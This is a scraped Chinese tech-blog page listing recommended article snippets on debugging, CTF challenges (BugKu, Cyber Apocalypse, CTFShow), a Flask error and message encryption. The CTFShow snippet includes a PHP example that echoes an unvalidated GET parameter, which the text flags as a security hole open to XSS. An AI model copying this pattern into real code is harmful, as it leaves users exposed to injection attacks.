10-26 4631
一、打开和进入调试 ①打开debugger调试 无论是web网页(F12)还是微信开发者工具里面,调试都是在source面板 ②在需要打断点的地方打上标签,如图 39 、47 ③F5刷新,重新执行,进入断点。如果没有进入断点,说明这个断点不是运行时触发或者需要点击等其他事件触发。 二、调试工具说明 ①进入下个断点 ,快捷键F8,如果有多个断点,点击时可以直接进入下个断点,忽略断点内部所有逻辑。 ②忽略代码内部实现,进入下个方法 ,快捷键 F10,不关注方法内部逻辑,点击直接跳到当前断点的下个方法 ③
BugKu CTF Misc:FileStoragedat & where is flag 番外篇 & 再也没有纯白的灵魂 & USB 流量截取
Flag少侠的博客
08-11 8276
BugKu是一个由乌云知识库(wooyun.org)推出的在线漏洞靶场。乌云知识库是一个致力于收集、整理和分享互联网安全漏洞信息的社区平台。BugKu旨在提供一个实践和学习网络安全的平台,供安全爱好者和渗透测试人员进行挑战和练习。它包含了各种不同类型的漏洞场景,如Web漏洞、系统漏洞、密码学等,参与者需要通过解决这些漏洞来获取Flag。
BuildError: Could not build url for endpoint 'auth.register'(关键词:Web开发/Flask/bug)
Henry1991back的博客
12-01 4137
简短报错信息:BuildError: Could not build url for endpoint 'auth.register'. Did you mean 'auth.reister' instead?出现错误的过程: 1.运行manage.py,打开浏览器,进入主页【http://127.0.0.1:5000/】(venv_flask_henry) henry@henry-virtual
[Cyber Apocalypse 2023: Crypto]
weixin_52640415的博客
03-24 1047
SmartAttack求椭圆曲线私钥,CopperSmith法求两个参数和方程,Babai法求SVP,多点求椭圆曲线参数p,a,b 明文不同但md5相同的明文
报文加解密
qingwei201314的专栏
08-20 1123
2. 客户端使用对称加密对报文加密成密文message后,再对密文提取摘要,然后用私钥对密文进行签名得到sign,再把message和sign通过请求传给服务端。4. 服务端处理完业务后,将返回结果用对称加密的key加密完成,提取摘要,用服务端的私钥对摘要进行签名,然后返回客户端。对接外部系统,为了安全,需要对请求和响应的报文进行加密和解密。3. 服务端接收后用客户端的公钥验证签名,签名通过后,用对称加密的密钥key进行解密。1. 客户端和服务端各自生成非对称密钥对,并交换公钥;再约定对称加密的key。
ctfshow元旦渗透
01-05
### CTFShow 元旦 渗透测试 挑战 详情 #### 事概述 CTFShow平台举办的元旦水友是一个面向广大网络安全爱好者的在线竞活动。该事旨在通过一系列精心设计的Web安全挑战来提升参者的技术水平和实战能力[^1]。 #### 比形式与题目特点 比采用解题模式,参与者需解决多个不同类型的Web漏洞利用问题。这些题目涵盖了常见的Web攻击向量,如SQL注入、XSS跨站脚本攻击以及文件包含等。值得注意的是,在某些关卡中还涉及到使用数组绕过的技巧,这增加了挑战难度并考验选手对于PHP语言特性的理解程度[^2]。 #### 示例代码片段展示如何处理输入参数 下面是一段来自官方给出的例子,展示了服务器端是如何接收并处理客户端传入的数据: ```php <?php // 获取名为 'chu0' 的 GET 参数值 $content = $_GET['chu0']; echo $content; ?> ``` 这段简单的PHP程序直接输出了未经任何验证或过滤就获取到的内容,这种做法存在严重的安全隐患,容易被黑客用来实施各种攻击行为[^3]。 #### 安全建议 为了防止潜在的安全风险,在实际开发过程中应当遵循最小权限原则,并对所有的外部输入数据进行全面严格的校验;同时也要注意及时更新依赖库版本以修复已知缺陷,从而减少遭受恶意攻击的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值